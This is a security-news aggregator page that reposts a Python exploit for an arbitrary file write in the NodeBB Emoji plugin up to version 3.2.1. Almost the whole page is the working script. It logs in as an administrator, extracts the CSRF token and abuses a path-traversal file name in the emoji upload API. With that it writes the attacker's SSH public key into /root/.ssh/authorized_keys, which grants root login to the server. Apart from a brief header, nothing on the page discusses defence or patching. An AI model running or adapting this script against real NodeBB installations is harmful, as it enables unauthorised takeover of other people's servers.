HackDig : Dig high-quality web security articles

NodeBB Plugin Emoji 3.2.1 Arbitrary File Write

2021-04-29 13:07
# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write# Date: 2021-02-01# Exploit Author: 1F98D# Software Link: https://nodebb.org/# Version: Emoji for NodeBB <= v3.2.1# Tested on: Ubuntu 18.04 (x86)# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji## The Emoji for NodeBB which is installed by default contains an# arbitrary file write vulnerability to insecurely handled user controlled# input.## This exploit requires administrative access to the NodeBB instance in order# to access the emoji upload API.# #!/usr/bin/python3import requestsimport sysimport reTARGET = 'http://192.168.1.1:4567'USERNAME = 'admin'PASSWORD = 'password'DESTINATION_FILE = '/root/.ssh/authorized_keys'SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'headers = { 'User-Agent': 'NotPython' }s = requests.Session()r = s.get('{}/login'.format(TARGET), headers=headers)if r.status_code != 200:    print('[!] Error, {}/login unavailable'.format(TARGET))    sys.exit(1)csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE)if csrf is None:    print('[!] Could not extract csrf token to proceed.')    sys.exit(1)auth = {    'username': USERNAME,    'password': PASSWORD,    '_csrf': csrf.group(1)}r = s.post('{}/login'.format(TARGET), headers=headers, data=auth)if r.status_code != 200:    print('[!] Error, login failed')    print('[!] Status: {}'.format(r.status_code))    print('[!] Response: {}'.format(r.text))    sys.exit(1)print('[+] Login successful')r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers)if r.status_code != 200:    print('[!] Error, could not access emoji plugin')    print('[!] Status: {}'.format(r.status_code))    print('[!] Response: {}'.format(r.text))    sys.exit(1)print('[+] Emoji plugin is installed')files = {    'emojiImage': open(SOURCE_FILE)}data = {    'fileName': '../../../../../../..{}'.format(DESTINATION_FILE)}r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files)if r.status_code != 200:    print('[!] Error, could not upload file')    print('[!] Status: {}'.format(r.status_code))    print('[!] Response: {}'.format(r.text))    sys.exit(1)print('[+] Successfully uploaded file')


Source: 8510401202-BLW/eussi/moc.ytirucesxc

Read:714 | Comments:0 | Tags:No Tag

“NodeBB Plugin Emoji 3.2.1 Arbitrary File Write”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3